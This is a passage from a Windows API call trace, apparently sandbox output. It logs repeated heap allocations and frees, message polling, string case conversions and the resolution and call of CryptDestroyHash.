[0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.776] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0164.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.778] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0164.778] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.778] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.779] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.779] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.779] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0164.779] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.780] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0164.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0164.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0164.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.781] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0164.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0164.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0164.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0164.781] CryptDestroyHash (hHash=0xaa5660) returned 1 [0164.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0164.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0164.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0164.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0164.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0164.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0164.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0164.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 